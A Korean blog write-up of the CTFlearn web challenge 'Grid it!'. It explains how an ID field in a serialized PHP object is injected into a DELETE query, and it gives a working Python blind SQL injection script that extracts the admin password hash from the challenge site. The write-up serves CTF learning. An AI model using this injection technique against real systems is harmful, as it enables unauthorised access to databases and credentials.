CTFlearn - [Web] Grid it! (풀이 봄)
CTFlearn - [Web] Grid it! (풀이 봄)
Grid it!
Link : ctflearn.com/challenge/430
1
2
3
4
Can you bypass the security measures on the site and find the flag?
I doubt it.
http://web.ctflearn.com/grid
Solution
가입을 한 뒤 로그인을 해봤는데 로그인이 안됌.
그래서 그냥 로그인을 해보면 아래와 같이 좌표를 입력하는 부분이 나옴.
여기서 소스코드를 보면 아래와 같이 serialize
화 되어있는 코드가 보임.
<
우선 좌표 입력에는 숫자만 가능해서 포기. 삭제하는 부분에서 어떻게 하면 될 것 같았음.
우선 코드를 생각해보면 point
클래스 안에 변수 x, y, ID
가 있을 것임.
여기서 더 못가서 풀이를 살짝 보았는데.. delete
를 할 때 아마도 ID 값이 DELETE SQL문
의 인자로 넘어갈 것임.
따라서 DELETE FROM ... WHERE ID=$classvar->ID
처럼 될 것임.
그럼 ID 값을 0 or 1
로 하면 DELETE FROM ... WHERE ID=0 or 1
이 될 것이므로 좌표 값들이 전부 삭제가 되는 것을 볼 수 있음.
이 점을 이용해서 Blind SQL Injection
으로 table_name, column_name
을 알아낸 뒤 flag가 있는 곳을 찾아야 함.
코드는 아래와 같고 table_name, column_name, 특정 컬럼의 값들
을 구할 때마다 값들을 바꿔주면 됨.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
import requests
global url, headers, cookies
url = "https://web.ctflearn.com/grid/controller.php"
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies= {
'PHPSESSID':'[redacted]',
'_ga':'[redacted]',
'__gads':'[redacted]',
'_gid':'[redacted]'
}
def add_point():
data={'x':'1', 'y':'2'}
requests.post(url+'?action=add_point',data=data, headers=headers, cookies=cookies)
table_name='' # point, user
column_name='' # user -> username, password, uid
# username='admin'
pw='' # 0c2c99a4ad05d39177c30b30531b119b -> grapevine
for i in range(33,101):
add_point()
chklen = 0
sql_len = 113 if i < 10 else 114
payload = {
'action':'delete_point',
'point':'O:5:"point":3:{s:1:"x";s:1:"1";s:1:"y";s:1:"1";s:2:"ID";s:'+str(sql_len)+':"0 or if((select length(bin(ascii(substr(password,'+str(i)+',1)))) from user where username=\'admin\' limit 0,1)=6,2535270,0)";}'
}
requests.get(url, params=payload, headers=headers, cookies=cookies)
res=requests.get('https://web.ctflearn.com/grid/index.php',headers=headers,cookies=cookies)
if "ID: 2535270 x:" not in res.text:
chklen=6
else:
chklen=7
pw_bit=''
add_point()
for j in range(1,chklen+1):
get_len = 117 if i < 10 else 118
payload = {
'action':'delete_point',
'point':'O:5:"point":3:{s:1:"x";s:1:"1";s:1:"y";s:1:"1";s:2:"ID";s:'+str(get_len)+':"0 or if((select substr(bin(ascii(substr(password,'+str(i)+',1))),'+str(j)+',1) from user where username=\'admin\' limit 0,1)=1,2535270,0)";}'
}
requests.get(url, params=payload, headers=headers, cookies=cookies)
res=requests.get('https://web.ctflearn.com/grid/index.php',headers=headers,cookies=cookies)
if "ID: 2535270 x:" not in res.text:
pw_bit+='1'
add_point()
else:
pw_bit+='0'
print("pw_bit[{}] : ".format(i), pw_bit)
pw+=chr(int(pw_bit,2))
print("pw :", pw)
참고
Link : github.com/terjanq/Flag-Capture/tree/master/Practice/CTFLearn/GridIt
This post is licensed under CC BY 4.0 by the author.